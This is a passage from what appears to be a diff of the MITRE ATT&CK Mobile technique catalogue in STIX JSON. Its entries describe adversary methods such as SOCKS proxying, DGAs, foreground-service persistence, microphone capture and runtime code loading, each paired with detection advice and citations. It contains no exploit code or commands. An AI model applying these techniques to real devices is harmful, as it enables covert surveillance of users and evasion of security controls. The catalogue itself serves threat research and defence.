which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)\n\nThe most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the `Proxy` API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "created": "2020-11-30T14:26:07.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1604", + "external_id": "T1604" + }, + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de", + "created": "2019-09-23T13:11:43.694Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1520", + "url": "https://attack.mitre.org/techniques/T1520" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T20:03:46.788Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--62adb627-f647-498e-b4cc-41499361bacb", + "created": "2017-10-25T14:48:20.727Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1435", + "url": "https://attack.mitre.org/techniques/T1435" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.", + "modified": "2022-04-01T12:50:48.453Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Calendar Entries", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access calendar information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3", + "created": "2017-10-25T14:48:21.354Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1465", + "url": "https://attack.mitre.org/techniques/T1465" + }, + { + "source_name": "Kaspersky-DarkHotel", + "url": "https://blog.kaspersky.com/darkhotel-apt/6613/", + "description": "Alex Drozhzhin. (2014, November 10). Darkhotel: a spy campaign in luxury Asian hotels. Retrieved December 24, 2016." + }, + { + "source_name": "NIST-SP800153", + "url": "http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf", + "description": "M. Souppaya and K. Scarfone. (2012, February). NIST SP 800-153 Guidelines for Securing Wireless Local Area Networks (WLANs). Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "LPN-0" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).", + "modified": "2022-04-06T15:51:11.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Rogue Wi-Fi Access Points", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:54:25.564Z", + "name": "Foreground Persistence", + "description": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)\n\nMalicious applications may abuse the `startForeground()` API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device’s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n\nMalicious applications may also abuse the `startForeground()` API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. Applications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "created": "2019-11-19T17:32:20.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1541", + "external_id": "T1541" + }, + { + "source_name": "Android-SensorsOverview", + "description": "Google. (n.d.). Sensors Overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices" + }, + { + "source_name": "Android-ForegroundServices", + "description": "Google. (n.d.). Services overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/components/services.html#Foreground" + }, + { + "source_name": "TrendMicro-Yellow Camera", + "description": "Song Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/" + }, + { + "source_name": "BlackHat Sutter Android Foreground 2019", + "description": "Thomas Sutter. (2019, December). Simple Spyware Androids Invisible Foreground Services and How to (Ab)use Them. Retrieved December 26, 2019.", + "url": "https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "created": "2017-10-25T14:48:23.233Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1458", + "url": "https://attack.mitre.org/techniques/T1458" + }, + { + "source_name": "Krebs-JuiceJacking", + "url": "http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/", + "description": "Brian Krebs. (2011, August 17). Beware of Juice-Jacking. Retrieved December 23, 2016." + }, + { + "source_name": "GoogleProjectZero-OATmeal", + "url": "https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html", + "description": "Jann Horn. (2018, September 10). OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB. Retrieved September 18, 2018." + }, + { + "source_name": "Lau-Mactans", + "url": "https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf", + "description": "Lau et al.. (2013). Mactans: Injecting Malware Into iOS Devices Via Malicious Chargers. Retrieved December 23, 2016." + }, + { + "source_name": "Computerworld-iPhoneCracking", + "url": "https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html", + "description": "Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved September 21, 2018." + }, + { + "source_name": "IBM-NexusUSB", + "url": "https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/", + "description": "Roee Hay. (2017, January 5). Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes. Retrieved January 11, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-1" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-2" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-6" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include: \n \n* Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB) \n* Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal) \n* Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices using physical access to the data port to unlock the passcode.(Citation: Computerworld-iPhoneCracking) ", + "modified": "2022-04-08T15:53:11.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replication Through Removable Media", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + }, + { + "phase_name": "lateral-movement", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T13:31:29.924Z", + "name": "Audio Capture", + "description": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information. \n\n \n\nAndroid and iOS, by default, require that applications request device microphone access from the user. \n\n \n\nOn Android devices, applications must hold the `RECORD_AUDIO` permission to access the microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission) \n\n \n\nOn iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\n\n\nIn Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\n \n\nAndroid applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized. \n\n \n\nIn both Android (6.0 and up) and iOS, users can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "created": "2017-10-25T14:48:12.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1429", + "external_id": "T1429" + }, + { + "source_name": "Manifest.permission", + "description": "Android Developers. (2022, March 17). Voice Call. Retrieved April 1, 2022.", + "url": "https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL" + }, + { + "source_name": "Requesting Auth-Media Capture", + "description": "Apple Developers. (n.d.). Requesting Authorization for Media Capture on iOS. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "Android Privacy Indicators", + "description": "Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.", + "url": "https://source.android.com/devices/tech/config/privacy-indicators" + }, + { + "source_name": "iOS Mic Spyware", + "description": "ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.", + "url": "https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:59:46.686Z", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. \n\nThere are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "created": "2022-03-30T14:49:18.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1625", + "external_id": "T1625" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:41:18.389Z", + "name": "Unix Shell", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken. \n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. \n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. \n\nIf the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "created": "2022-03-30T13:59:50.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623/001", + "external_id": "T1623.001" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "created": "2017-10-25T14:48:33.158Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437", + "url": "https://attack.mitre.org/techniques/T1437" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.", + "modified": "2022-04-19T20:03:51.831Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Layer Protocol", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:11.861Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1431", + "external_id": "T1431" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Web Download", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:21:59.494Z", + "name": "Download New Code at Runtime", + "description": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s `JavascriptInterface` capability. \n\nOn iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Existing network infrastructure may detect network calls to known malicious domains or the transfer of malicious payloads over the network. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities). Unfortunately, this is only a partial mitigation, as additional scrutiny would still need to be applied to applications that use these techniques. These techniques are often used without malicious intent, and applications may employ other techniques to hide their use of these techniques.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.4", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "created": "2017-10-25T14:48:14.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1407", + "external_id": "T1407" + }, + { + "source_name": "FireEye-JSPatch", + "description": "Jing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. Retrieved December 9, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html", + "external_id": "APP-20" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a", + "created": "2017-10-25T14:48:21.023Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1468", + "url": "https://attack.mitre.org/techniques/T1468" + }, + { + "source_name": "Krebs-Location", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)", + "modified": "2022-04-05T19:40:25.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Track Device Without Authorization", + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:51:04.432Z", + "name": "System Checks", + "description": 